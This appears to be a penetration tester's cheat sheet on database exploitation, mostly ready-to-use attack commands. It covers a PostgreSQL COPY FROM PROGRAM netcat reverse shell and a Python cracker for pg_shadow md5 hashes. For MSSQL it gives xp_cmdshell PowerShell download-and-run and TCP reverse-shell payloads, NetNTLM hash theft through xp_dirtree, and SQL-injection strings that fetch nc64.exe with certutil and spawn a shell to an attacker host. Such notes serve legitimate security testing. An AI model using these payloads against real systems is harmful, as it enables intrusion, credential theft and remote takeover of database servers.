Database Explotation

PostgreSQL Command Execution

Using COPY TO/FROM PROGRAM

Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.

Check if the user is superuser

SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;

CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f';

PostgreSQL Cracking (md5 password + username)

The hashes from pg_shadow uses that format -> md5(password + username)

If we are not able to crack the md5 hash of postgres we can use this script.

import hashlib

target_hash = "md5ae8c67affdb169a42c9631c02fc67ede"
username = "rubben"

with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.strip()
        combo = password + username
        hashed = "md5" + hashlib.md5(combo.encode()).hexdigest()
        if hashed == target_hash:
            print(f"[+] Password found: {password}")
            break

MSSQL

Check privileges

SELECT IS_SRVROLEMEMBER('sysadmin')

Enable xp_cmdshell (With privileges)

enable_xp_cmdshell

For establishing reverse shell (rev.ps1 is nishang shell):

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.6.125/rev.ps1") | powershell -noprofile'

EXEC xp_cmdshell 'powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient(''10.8.6.125'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String );$r2=$r+''PS ''+$env:COMPUTERNAME+''> ''; $s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}"'

Other Method

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

**Steal NetNTLM Hash / Relay Attack (**Without privileges)

Though we can’t execute commands using xp_cmdshell we can steal hashes of the SQL service account by using xp_dirtree or xp_fileexist.

exec xp_dirtree '\\<ip>\smbFolder\file'

And with the smbserver grab the hash:

impacket-smbserver smbFolder $(pwd) -smb2support

Enable xp_cmdshell via SQL Injection

';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure "xp_cmdshell", 1;--
';RECONFIGURE;--

';EXEC xp_cmdshell "certutil -urlcache -f http://kali_ip/nc64.exe c:/windows/temp/nc64.exe";-- 

';EXEC xp_cmdshell "c:/windows/temp/nc64.exe IP PORT -e cmd";--